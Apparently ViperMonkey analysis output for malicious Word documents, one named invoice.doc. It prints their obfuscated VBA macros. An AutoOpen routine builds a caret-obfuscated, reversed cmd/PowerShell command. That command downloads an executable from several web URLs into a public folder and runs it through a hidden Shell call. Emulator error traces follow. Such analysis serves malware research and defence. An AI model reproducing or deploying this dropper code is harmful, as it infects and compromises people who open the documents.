cwubjUDHFPX = SQLYnHbmtuXqnw + Mid(NzbrGP + "iIorozdHbGInI7GVwnkTC2lBpQhwdASPzvGz2cY2jqd1t" + DfKKalNhTMmoYN, 26, 6)
GvtUwFc = (4247676 * DZiUnwOqZQqwY * 6978572 - zulAVWO) + NiTcCfWaQUNzwQ + Sqr(dWLMl) * (AVpdocKwQAWpcV / 8085160)
mSUXwRrC = (3863244 * LLCqZbK * 6982015 - ihIdKKc) + Mid + Sqr(OCMdAUqKVuWIDz) * (jFa / 8744179)
RdiNY = (5948515 * TuconqMMbJhqV * 9468246 - pMZHT) + znLzaKJs + Sqr(lPwEuIkpMdizt) * (pShCrusAlKU / 3739894)
BNUpdJiCrzw = bIhqHDXz + Mid(QTZDLMrSOO + "Pq1PDhwdAScjmc%!TPAk1Cq" + cEiQ, 6, 11)
AibILksdw = (520659 * dnkbCTBzzbd * 2545605 - XbRArp) + nHVsNEvH + Sqr(YlVdmnD) * (bwlVNjOwto / 9610607)
bUJUYNcz = (1029959 * HaJjzWSsO * 9530160 - tfYpIjak) + lYsDzaaG + Sqr(UQzCsRLMwpQkn) * (ANchIY / 8079329)
EQKJOjpaC = (1828297 * NhpihF * 6371304 - wLwuhaqm) + iwml + Sqr(nwLspXs) * (iEKDjVC / 6633105)
hjCnA = RoMjDUj + Mid(RrQCAEWN + "kYRset %wnskou0w8dq4G" + pbGCVjsHRw, 4, 5)
CuiihWlEWm = (5672616 * jiqVjZzpXSzOJ * 8612288 - ClzRnKnb) + bLLppFopvujp + Sqr(QLauEzJvfidQOY) * (MpkvDBuYNK / 9991320)
dXiWDMCIKjI = (3379215 * JTOJjFVmr * 8681727 - oRtw) + hYbhHcFKo + Sqr(uWmNjEhflMT) * (hIDuVwi / 1369360)
hrlNpFofr = (7277045 * zvfl * 4634699 - WhNEVzKzzdJ) + GlI + Sqr(JNrTdMGJjjA) * (YqhwfzJDwOz / 6959084)
YSGRiBPXFi = GPSUYoTTnlv + Mid(utW + "Dfcjmc%dXXctruRQncsZoC" + utrWoQJii, 3, 5)
ubHzE = (7263723 * NHUaROVEjzmLE * 2856111 - bqA) + uqLnadmvc + Sqr(rYvb) * (FmkjrMiUHzlP / 704557)
KphurQqMX = (6475487 * vSab * 8335732 - CUuw) + TswobqkNJR + Sqr(KIQLVDqpOjNV) * (ZzUjl / 545551)
phtIA = (3613602 * jNspVTVuipXp * 783280 - RKfj) + dFivFXnPdWAbGw + Sqr(avX) * (zkUujtpj / 1321210)
ICCijHlKu = DvrncAAANmSuEG + Mid(aEYow + "obVVkaojl3qvToGaA4iQnGXTDEdJcICQjS%=^Xp" + aIwKWJbE, 25, 13)
QhdjvXDXn = (3083449 * jzzMwZCJQaik * 662556 - hcVEfY) + EkJWuTqfZBPW + Sqr(CFuLioOhl) * (sCGR / 6371900)
sfcnlZPB = (6351637 * vWrCcMoqBFMd * 8360586 - ONcPbhJW) + KHSiRUoCIwkF + Sqr(fZZsGVjjBEuhd) * (iCFzfZfjvKiW / 4176063)
JwJfnwqPGVS = (2516276 * DfH * 3642795 - iCpibop) + JDXw + Sqr(jKzDzFjOziPK) * (ATjzZnOJGbN / 4487693)
wvBzjlJiQz = fJECEokAR + Mid(SiDsYiNQrCj + "Gao4AsAn%SU8basDEnvOmBnPUKiTRd" + nJjOJKzB, 9, 3)
FJIYKUf = (7050918 * iailfbOwqd * 7354267 - YAKQdwtlc) + XCo + Sqr(fDOzJNBEEPURVD) * (pPFmvAqdEzQk / 9829704)
hHrJHpnF = (921132 * CfzjwKitT * 4669850 - TwvwLbpzn) + SQszoaKztdCz + Sqr(MoToHcGWl) * (TjuhHm / 7858295)
iBDELVW = (8998027 * Qnk * 2888679 - hHkX) + ZuaTTiIrmiVjR + Sqr(CZSusDNEiB) * (qcZOHArjdMT / 8645964)
cqTnAarXPjj = rjYWrmmipC + Mid(AfB + "CGzkV7mP8=p^o^w^er&&set 0YjVL" + FiYZYrnVaMi, 10, 15)
bHwHwGiO = (6082148 * dzoUjjGSsE * 3728582 - WVw) + ZNjsnzO + Sqr(rGTbwtQRWiCmhi) * (wIuAQMRqD / 7412490)
TzQHM = (1577087 * VtnuijqdcM * 6013495 - wnCjrSM) + qkkktzwlZQQ + Sqr(qNuXjjYDrFzm) * (ZBcKlwlaV / 8126448)
nanhNHAz = (7149594 * DBikE * 764722 - wqdlt) + wItJvkkwHT + Sqr(VbnRiOVWJNjhtS) * (BnpmvPjfoqrQ / 5022377)
JHZBdBi = bzzuCMfk + Mid(DMfONsUf + "dfjS%! lf0PGitXQ98YTZtcQsfdMojZDYlEdoR" + MZlcFid, 3, 5)
VYZFQcMzarP = hjCnA + cwubjUDHFPX + YSGRiBPXFi + cqTnAarXPjj + wvBzjlJiQz + JBhYa + ICCijHlKu + wcQNw + BNUpdJiCrzw + zFnSqfnU + TNSWjiaP + dPiDnEDJd + JHZBdBi
FALwijPcQ = (8906322 * cIPjQQa * 37713 - IjzIUXimwwbn) + uRICkwMDKltXKm + Sqr(zPYPrZSWDDbLwc) * (RSiiOzaOjb / 7582016)
ozwDkKkim = (6374213 * LwYcvFzIn * 2826591 - iTatjYCYA) + nDlUXzSQaPpzr + Sqr(iFlC) * (OXoYNTi / 5661827)
riLjOjjXs = (7617592 * XFjs * 2568727 - kicTKanzCmTzfX) + sWb + Sqr(OibTHjqRciP) * (faZdoCKjDY / 6384208)
End Function

-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO     parsed Function VYZFQcMzarP (): 57 statement(s)
Module None
  Function VYZFQcMzarP (): 57 statement(s)

-------------------------------------------------------------------------------
VBA MACRO WzjunIotaz.bas
in file: invoice.doc - OLE stream: u'Macros/VBA/WzjunIotaz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function FDQmvuwLDc()
On Error Resume Next
qihDaiEn = (7047872 * NquXDhFbEw * 9498682 - FiOnFXNooYu) + vOmd + Sqr(cRrkmpvUZl) * (kIUinRbX / 8200932)
ZVXZcFfP = (2758950 * jXwtpv * 7729022 - ovcwchFAT) + STflrDjDLSin + Sqr(mQOlUo) * (AzfzzaIMrBhQI / 6625340)
CQmzISULkc = (4572236 * iufsNljVwAjpf * 2704995 - kMaoTninQvTLKl) + fjPWjq + Sqr(wfOPKwzuThdE) * (EhtEHzHPwtaZkl / 4112500)
vPEZqLm = ZzcqzwoihvU + Mid(VUDlOzoEq + "FhdnfhTmrzTrCvMjjYz" + ZhkChCEBTDk, 2, 2)
fJWPAako = (4981530 * bttYvz * 343326 - mSBiQQtTHsUw) + XNPuBWVPI + Sqr(MDVOcjOmGmT) * (UJkQS / 6196445)
RQSqknXa = (6156485 * vWdlEjdduc * 6138981 - ijoauCRk) + GNKIMtGKlEpjd + Sqr(qakKvGkrdGvh) * (UJVPPvmpIScr / 7548023)
dAtBRmZOqoo = (4401616 * IYqoAoz * 166578 - sViIO) + ENfFmAPoaor + Sqr(iHH) * (IjQjEPG / 6189918)
YikpblIf = aJiFvPu + Mid(DdjqWcmhF + "KZVzfZnztboqw eqw &         KZPwC" + IzmKOjjZzmnq, 11, 18)
lTLNKRrUJQh = (621617 * jWNZLt * 8566913 - awzq) + AFWLHPK + Sqr(jWlwrZINbVapTi) * (wNDAJUmwt / 7750317)
rWUXjzZBAB = (2269273 * BcuHcsTAAcdT * 3835477 - swcXAARcazE) + BctZrI + Sqr(kGkjOwzAic) * (kkjYbnU / 4399733)
CftcFpX = (7587642 * XYCwC * 2651902 - rGbkVnjdIROZ) + Aiz + Sqr(NUic) * (GFU / 4007731)
IFnoF = WIMXtRdbXOPMhk + Mid(skPAJnO + "IswZuuiqEj   /V        pUKz" + BaNvrifoHzGPs, 11, 13)
DwhdoGz = (3063456 * TVv * 5029789 - CozrGwWwXl) + jjzWlJYIlA + Sqr(FrSbfTOdb) * (toC / 1736326)
QjDVBsndQ = (7262381 * haZkLth * 1808217 - WtPJzm) + hajGYfSDjuKh + Sqr(vwNzpriMQRMJ) * (LJazT / 5772984)
OowoJIBpQII = (2611933 * HcZf * 9078033 - IVA) + iAWUZf + Sqr(UGEcRI) * (wPUJdjbj / 3764705)
OOdaszmpw = NihjLkFJbB + Mid(PwwvTWFzjLo + "uzKiF  jCHHPvYdCWDGoltd" + wjiiOqAV, 6, 2)
PEhjzoHdjIc = (8269887 * aRilBHtnciZiz * 5425269 - KFwzl) + OGbzwLccwKf + Sqr(oYG) * (roNJvDEZKR / 2559708)
VtiBBjqMz = (8606929 * jhFFJLKC * 7749564 - vQK) + UtdLDCfNK + Sqr(cqKCCmhwjGP) * (azfMvbCkR / 8517602)
jMsClcsAOb = (7112101 * jfjFJqqVX * 3561011 - SBIABWzhD) + rTijqG + Sqr(LaU) * (FkSWFbotPuF / 1469005)
nbilQ = oUoUuoaqPBdJ + Mid(qkvkwXJcqUCi + "wBqZ /c   dDNwbTWhUvtDO" + iwsQpBjojE, 5, 6)
PpikICFaQfQ = (3810804 * ScJMAZYXaL * 752878 - VId) + IKfzuwwFSLX + Sqr(tGztFoRKAkwSo) * (PTrtnfKjdCcUj / 3939524)
YGqGSjbaMZ = (6186167 * upC * 5873628 - ULJvjqSjY) + NKBidN + Sqr(YrjKczRl) * (zdwp / 1518212)
zkjXzSd = (3078622 * OvHhz * 1262968 - rzFoPKilCqVQ) + vUrOs + Sqr(ctpni) * (zAmn / 4256249)
BKitCoHTFFn = MLnaBNULhM + Mid(LBZTkmKwzrNQp + "Emqjas jjjsjjhAwzMcqHmCJ" + vvInnTmMH, 4, 10)
wwFpN = (1976911 * zGDJVGqjFhNhO * 2754735 - lsjdqonIowzYk) + bMuvYr + Sqr(KlimwDYNoiIVaY) * (ODT / 1350554)
zRdQUzuP = (2326592 * PKVhGSiUSlqWsa * 1308635 - qrk) + vzUrDJ + Sqr(YwrcRfAvaMFsk) * (sWsRwiwwMNbWw / 651791)
VKWzYw = (2965572 * iiwaGWbJYrri * 6192062 - kzAVCdbZEbuc) + iAvizjkibvK + Sqr(VuisHqTPXccV) * (AlOEZVfil / 9468875)
RatBKBIkzu = aRDrKWICbWL + Mid(FTqFOuDtp + "qiNRinZ  %C^om^S^p^Ec%   QaTwDU" + ivCMXjSJvwj, 8, 18)
osAKzQH = (1749041 * zZPwvUTQTZj * 8648177 - CVXbkER) + vmEBwDad + Sqr(cKZw) * (TRzpFszhztO / 5576844)
IftdIoTua = (8417408 * GbqarNBnLwzRsm * 2608011 - VTXRCFbvwZZOoK) + VMbXfmkijjjG + Sqr(roz) * (TAXuF / 5110210)
vWoFBpaTw = (9407110 * zvb * 3364206 - nzAIcEROiKkl) + hVzXDJaNunmt + Sqr(liXfrJ) * (vwhFvP / 6929290)
RlbniQ = dJuwwHID + Mid(ihishzlaMNBX + "mwwcQUFGRwqcmd uhpo dojDhsnRC" + HwuVdCai, 12, 9)
ZMisRufZ = (8428394 * Iwzkzs * 703571 - EzrZUDVs) + BQwGjWMnZI + Sqr(GwDrzKkPNiQ) * (iUzTjvXjS / 342418)
YSmnvQlsGaP = (9241187 * JvJZZnwXjQP * 1075403 - AZKTGiClpNllCd) + BcUFCRiDAKpah + Sqr(rREsYiVNNMXuA) * (iYnXKEW / 1434034)
vFIBjID = (9361540 * CiRWK * 1701879 - DUszvh) + iuWnOHhIQPVcX + Sqr(PdWkVup) * (RzDEvTZHVmqus / 3120015)
cwnTWnSRw = zlqnIStbAbrR + Mid(asMNONTmrCTb + "FRasjsdiuwWNQaOcqZYzsUKqBnOTTpTUUAVvEwjqjzqVv" + skotcoZ, 4, 7)
Kvmznnos = (3276769 * jOzVSwfjlHLDp * 1386158 - KzhdPKEIRwIY) + uhWuWIEOXOsP + Sqr(zWlXhnSMlq) * (CBkbF / 6530127)
aPAYGq = (4865981 * XqpEl * 3317847 - hCYmipOjLi) + tOUGcIqM + Sqr(UXdIpphrrKSAG) * (FQnwIUoVZsinKp / 3393487)
PRKAl = (2871126 * NZZNJYQztH * 4393495 - APWnPPpoJirD) + wkZBfsZcdFajlw + Sqr(XBOMRjYdMAvab) * (WfiVPKnqv / 2729758)
wVWoLFJ = ispdtNCAhlwo + Mid(WNanEldWkKLN + "WBDbqwuiqwh hiqwoeqwpi pAjXPGsUwaz" + ItjldZzworf, 4, 21)
RzTXzNZj = (5019212 * LWlEjGAwUUBTQ * 8648805 - HiIOLDj) + kjdtiwzKQkDvGj + Sqr(lBTjRwZozISKT) * (sOpcZBYCNWBUJ / 7139600)
dsSiTEQ = (6728435 * zKblX * 2506480 - WRwLsjkLmjQXV) + ThfUio + Sqr(fwonFkLHjhWfWS) * (apjWc / 2023637)
AabjGvEwwH = (2916095 * tNNzidvQoYvr * 3864857 - XmvZE) + wus + Sqr(vHGqoLMmPIvarl) * (inRhGaarPR / 8762218)
NYURdbDri = zMXKvHdSz + Mid(ITimSaH + "iPNBDsQGakjbmEKCzRNvOTWTnDqihDjBqLHEwVU" + BjSzCH, 9, 4)
SztaRks = (6156873 * RzF * 5570731 - KHioEuRwfA) + wQKfzKk + Sqr(qiGfjhrDdYu) * (sSciSjr / 1696428)
KHGpf = (8218208 * WlqE * 9293714 - wAGGMVm) + EcBGMrnakicjoc + Sqr(QSctk) * (VoclX / 981265)
EmlbA = (5613106 * nGXfcdq * 5972344 - wzSvAIcQjVn) + okbCninYVpmK + Sqr(wbEAL) * (WlhjtRQUjAVrjp / 5319771)
EDGOIzX = DGMqwVODWWF + Mid(cMJbMPzvK + "IqcIUqu ioqwu epoqw jdjska dhtnUDZoAswhJoqspGlFsbHHV" + aPjNlXVQrYukJ, 6, 24)
lLRwiGYlEQ = (1887130 * WDSfRZjJ * 5636922 - zdFWNY) + rSMtRjwi + Sqr(IKmFHa) * (twSzZp / 5872079)
RXawiUShElE = (344961 * uwGuvapwK * 1099774 - wdEXVzCQVWXI) + QLYuZwBn + Sqr(SXhqn) * (hVqvBnQ / 3162663)
dkDtXzvuzEI = (8767876 * dcnNjEWphdjCvX * 2312076 - zlL) + pfJiizjcHl + Sqr(ufw) * (VOZiNBsIJkfaSj / 9497696)
jJBjcfU = WvdpvDGPGNHmEj + Mid(QUWREHDi + "hwrIZMkdEpjfAKjPfQr      zjijiiPCSDjJ" + XOGYAzCVhzF, 20, 6)
FDQmvuwLDc = RlbniQ + BKitCoHTFFn + cwnTWnSRw + EDGOIzX + NYURdbDri + vPEZqLm + wVWoLFJ + YikpblIf + RatBKBIkzu + OOdaszmpw + IFnoF + nbilQ + jJBjcfU
niFMGwSFi = (6224008 * uivdoXwb * 8085538 - ZGzfzWzzDZNs) + wVpSr + Sqr(DJuwqHJMfvIdrt) * (NYHj / 1819686)
cTHbGJBYz = (1684975 * EEimjiIGYnJTBu * 9203716 - zCkzhliV) + BTrjFlPXwDY + Sqr(GbiPA) * (WSzF / 6290769)
KnBVNLRSW = (1796808 * iLQ * 5097552 - BuwEqXJ) + bBhjdMCkwmjsD + Sqr(BLflCD) * (wXz / 5089518)
End Function
Sub lZFUFoiihGosi(vwsOuUphvwsw As String)
On Error Resume Next
lBTwYvjNf = (3610452 * SWJnswPiCMaXc * 8169533 - uEsVlaRjFq) + DIhJZhCJs + Sqr(KXES) * (nHp / 2261922)
irGsBcVJh = (3712739 * nEz * 3182823 - HwsmsUSzZkhnD) + nKttMkwQjhE + Sqr(UqrTFZoZ) * (qOCSJYISRuhFw / 6166318)
Shell vwsOuUphvwsw, 0
qtKlfwqQL = (6710885 * zcGGiHz * 5855037 - wvqaCMozPmWS) + KAavoIcE + Sqr(DTwJvCMnn) * (bKjvCkiTIs / 272950)
YMCdSFfiS = (8306614 * jWr * 4455404 - sRllbwnrL) + FXLGpULYf + Sqr(wjcz) * (EVrZaNDfHp / 407390)
End Sub

-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO     parsed Function FDQmvuwLDc (): 57 statement(s)
INFO     parsed Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
Module None
  Sub lZFUFoiihGosi ([vwsOuUphvwsw as String]): 6 statement(s)
  Function FDQmvuwLDc (): 57 statement(s)

Traceback (most recent call last):
  File "/opt/ViperMonkey-master/vipermonkey/vmonkey.py", line 296, in process_file
    for (subfilename, stream_path, form_variables) in vba.extract_form_strings_extended():
AttributeError: 'VBA_Parser' object has no attribute 'extract_form_strings_extended'

INFO     calling Function: Format('C')
WARNING  Function 'Format' not found

$ vmonkey dd0adccad0039f61c953ff7014f8c8aea50df0cf
 _    ___                 __  ___            __
| |  / (_)___  ___  _____/  |/  /___  ____  / /_____  __  __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ /  __/ /  / /  / / /_/ / / / / ,< /  __/ /_/ /
|___/_/ .___/\___/_/  /_/  /_/\____/_/ /_/_/|_|\___/\__, /
     /_/                                           /____/
vmonkey 0.07 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues

===============================================================================
FILE: dd0adccad0039f61c953ff7014f8c8aea50df0cf
-------------------------------------------------------------------------------
VBA MACRO EwiAcaJrEiEa.cls
in file: dd0adccad0039f61c953ff7014f8c8aea50df0cf - OLE stream: u'Macros/VBA/EwiAcaJrEiEa'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Sub AutoOpen()
On Error Resume Next
   Dim SXpODS()
ReDim SXpODS(3)
SXpODS(0) = 93
SXpODS(1) = 8992
SXpODS(2) = 9459

   Dim nfbmc()
ReDim nfbmc(3)
nfbmc(0) = 293675403
nfbmc(1) = 7
nfbmc(2) = 702

   Dim hYjPi()
ReDim hYjPi(3)
hYjPi(0) = 93
hYjPi(1) = 5
hYjPi(2) = 1976

   Dim jWQjS()
ReDim jWQjS(4)
jWQjS(0) = 17
jWQjS(1) = 303
jWQjS(2) = 982
jWQjS(3) = 9

   Dim OapZu()
ReDim OapZu(5)
OapZu(0) = 2
OapZu(1) = 9
OapZu(2) = 98834684
OapZu(3) = 55210411
OapZu(4) = 91

   Dim kWsjP()
ReDim kWsjP(4)
kWsjP(0) = 7408
kWsjP(1) = 321
kWsjP(2) = 9
kWsjP(3) = 312

   Dim pzhPSF()
ReDim pzhPSF(5)
pzhPSF(0) = 3
pzhPSF(1) = 414933890
pzhPSF(2) = 89
pzhPSF(3) = 962
pzhPSF(4) = 9

Shell@ LTuzuiQ + KZbIqrscsDqR + nqLzrRwnOzbkp, Format(0)
   Dim SJcYtF()
ReDim SJcYtF(2)
SJcYtF(0) = 6913
SJcYtF(1) = 65

End Sub


-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO     parsed Sub AutoOpen (): 47 statement(s)
Module None
  Sub AutoOpen (): 47 statement(s)

-------------------------------------------------------------------------------
VBA MACRO FzniJjjRVH.bas
in file: dd0adccad0039f61c953ff7014f8c8aea50df0cf - OLE stream: u'Macros/VBA/FzniJjjRVH'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
Function LTuzuiQ()

On Error Resume Next
Dim irbnC()
ReDim irbnC(2)
irbnC(0) = 2
irbnC(1) = 58

   Dim QvZWJ()
ReDim QvZWJ(3)
QvZWJ(0) = 33
QvZWJ(1) = 72780562
QvZWJ(2) = 8

   Dim AzHhc()
ReDim AzHhc(5)
AzHhc(0) = 6
AzHhc(1) = 392230015
AzHhc(2) = 8
AzHhc(3) = 9014
AzHhc(4) = 75197952

   Dim XtDsl()
ReDim XtDsl(5)
XtDsl(0) = 63625617
XtDsl(1) = 8
XtDsl(2) = 5
XtDsl(3) = 823
XtDsl(4) = 9

OBijuHBFaLa = Format(Chr(5 + 14 + 8 + 7 + 65)) + "md /V:/" + Format(Chr(3 + 10 + 5 + 5 + 44)) + Format(Chr(1 + 4 + 2 + 2 + 25)) + "^s^et l" + "^e=  ^   ^  ^ ^ " + "        ^}}" + "^{h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^t^a" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^};^k^a^er^" + "b^;" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$^ me^tI^-ek"
Dim MvTTn()
ReDim MvTTn(5)
MvTTn(0) = 997
MvTTn(1) = 2
MvTTn(2) = 409
MvTTn(3) = 9
MvTTn(4) = 8054

   Dim TtCpY()
ReDim TtCpY(5)
TtCpY(0) = 517402771
TtCpY(1) = 299854020
TtCpY(2) = 91
TtCpY(3) = 5305
TtCpY(4) = 143

   Dim uXRIj()
ReDim uXRIj(4)
uXRIj(0) = 350
uXRIj(1) = 34
uXRIj(2) = 640
uXRIj(3) = 385980877

   Dim OjdDA()
ReDim OjdDA(5)
OjdDA(0) = 98889860
OjdDA(1) = 971
OjdDA(2) = 24
OjdDA(3) = 2
OjdDA(4) = 3998

rFqkiY = "^ovn^I^;)" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "ia^$" + "^ ,^j^p^X$(^el" + "iF^d^a^o^lnw^o^D.^w^u^I${^y" + "rt^{)ZXn$ ni^ ^j^pX$" + "(h" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^a^er^of^;'^" + "e^xe.'^+^O^U^I$+^'^\^'+" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^" + "i^lbup:vne$^=" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "^ia$^" + ";^'093'^ ^= O^UI$^" + ";)'@'(tilp^S^.'J2b6^B/^tn^etn" + "o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^-^pw/r^"
Dim tZnGwA()
ReDim tZnGwA(4)
tZnGwA(0) = 878
tZnGwA(1) = 167883523
tZnGwA(2) = 3977
tZnGwA(3) = 257

zUhDioazMp = "k^.o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^.^y^ar^t^i//^:p" + "^tth@A^" + "A" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "57^Bj/ur." + Format(Chr(5 + 14 + 8 + 7 + 65)) + "i^t^s" + "i^go^lk^ta" + "//^:^pt^th@l"
Dim rIzjH()
ReDim rIzjH(5)
rIzjH(0) = 15
rIzjH(1) = 85
rIzjH(2) = 222341352
rIzjH(3) = 774
rIzjH(4) = 15414680

   Dim nWPYh()
ReDim nWPYh(2)
nWPYh(0) = 7
nWPYh(1) = 9917

   Dim hjSSnC()
ReDim hjSSnC(4)
hjSSnC(0) = 8
hjSSnC(1) = 3925
hjSSnC(2) = 272
hjSSnC(3) = 971

   Dim hiGHL()
ReDim hiGHL(3)
hiGHL(0) = 1819
hiGHL(1) = 7321
hiGHL(2) = 3

   Dim GbGfr()
ReDim GbGfr(3)
GbGfr(0) = 174
GbGfr(1) = 94
GbGfr(2) = 11

   Dim fwQjB()
ReDim fwQjB(3)
fwQjB(0) = 59130641
fwQjB(1) = 72
fwQjB(2) = 62

pWfpdNuIl = "^0^k5/^s^d" + "a^o^l^pu/tne^tno" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "-pw/ra^." + "u^d^e^.pl^u.sa^moi^" + "d^ie^do" + "tut^itsn^i//^:^p^t^" + "th@4p2u^Z01/^m^o" + Format(Chr(5 + 14 + 8 + 7 + 65)) + ".^ov^it^isopro^lav//:^ptt" + "^h^@j^A^" + "M^2U/^ur^.ely^" + "t^snusbd//^:ptth'^=^Z^Xn$^;^t"
Dim jwJMh()
ReDim jwJMh(5)
jwJMh(0) = 350988871
jwJMh(1) = 54
jwJMh(2) = 2
jwJMh(3) = 352674196
jwJMh(4) = 24

   Dim UKQvML()
ReDim UKQvML(4)
UKQvML(0) = 5
UKQvML(1) = 60
UKQvML(2) = 318547392
UKQvML(3) = 87

   Dim GilGm()
ReDim GilGm(5)
GilGm(0) = 8
GilGm(1) = 5
GilGm(2) = 799
GilGm(3) = 871
GilGm(4) = 82

   Dim tiPpu()
ReDim tiPpu(2)
tiPpu(0) = 7
tiPpu(1) = 73

CcZXXktaIj = "neil" + Format(Chr(3 + 10 + 5 + 5 + 44)) + "beW.^teN^ t" + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^e" + "^jbo-^wen=^w^u^I^$^" + " ^l^l^eh^sr^ewo^p&&^f^o" + "r /^L %^W ^in (" + "^396^;-^" + "1;^0)d^o ^s^e^t ^M" + "G^U=!^MG^U!!l^e:~%^W,1!&&^i^f" + " %^W e^q^u ^0 " + Format(Chr(5 + 14 + 8 + 7 + 65)) + "^a^l^" + "l %^MG^U:^*^M^G" + "^U!^=%" + Format(Chr(1 + 4 + 2 + 2 + 25)) + ""
LTuzuiQ = OBijuHBFaLa + rFqkiY + zUhDioazMp + pWfpdNuIl + CcZXXktaIj
   Dim cpBuji()
ReDim cpBuji(2)
cpBuji(0) = 6
cpBuji(1) = 146

   Dim wDszIX()
ReDim wDszIX(4)
wDszIX(0) = 462538301
wDszIX(1) = 225457549
wDszIX(2) = 9
wDszIX(3) = 20

End Function


-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO     parsed Function LTuzuiQ (): 129 statement(s)
Module None
  Function LTuzuiQ (): 129 statement(s)

-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):
INFO     ACTION: Found Entry Point - params 'autoopen' -
INFO     evaluating Sub AutoOpen
ERROR    chr() arg not in range(256)
ERROR    8992 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    9459 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    293675403 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    702 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    1976 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    303 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    982 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    98834684 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    55210411 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    7408 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    321 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    312 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    414933890 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    962 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    72780562 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    392230015 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    9014 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    75197952 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    63625617 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    823 cannot be converted to ASCII.
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('C')
WARNING  Function 'Format' not found
INFO     calling Function: Format('"')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('C')
WARNING  Function 'Format' not found
ERROR    chr() arg not in range(256)
ERROR    997 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    409 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    8054 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    517402771 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    299854020 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    5305 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    350 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    640 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    385980877 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    98889860 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    971 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    3998 cannot be converted to ASCII.
INFO     calling Function: Format('C')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('C')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
ERROR    chr() arg not in range(256)
ERROR    878 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    167883523 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    3977 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    257 cannot be converted to ASCII.
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('C')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
ERROR    chr() arg not in range(256)
ERROR    222341352 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    774 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    15414680 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    9917 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    3925 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    272 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    971 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    1819 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    7321 cannot be converted to ASCII.
ERROR    chr() arg not in range(256)
ERROR    59130641 cannot be converted to ASCII.
INFO     calling Function: Format('c')
WARNING  Function 'Format' not found
INFO     calling Function: Format('c')
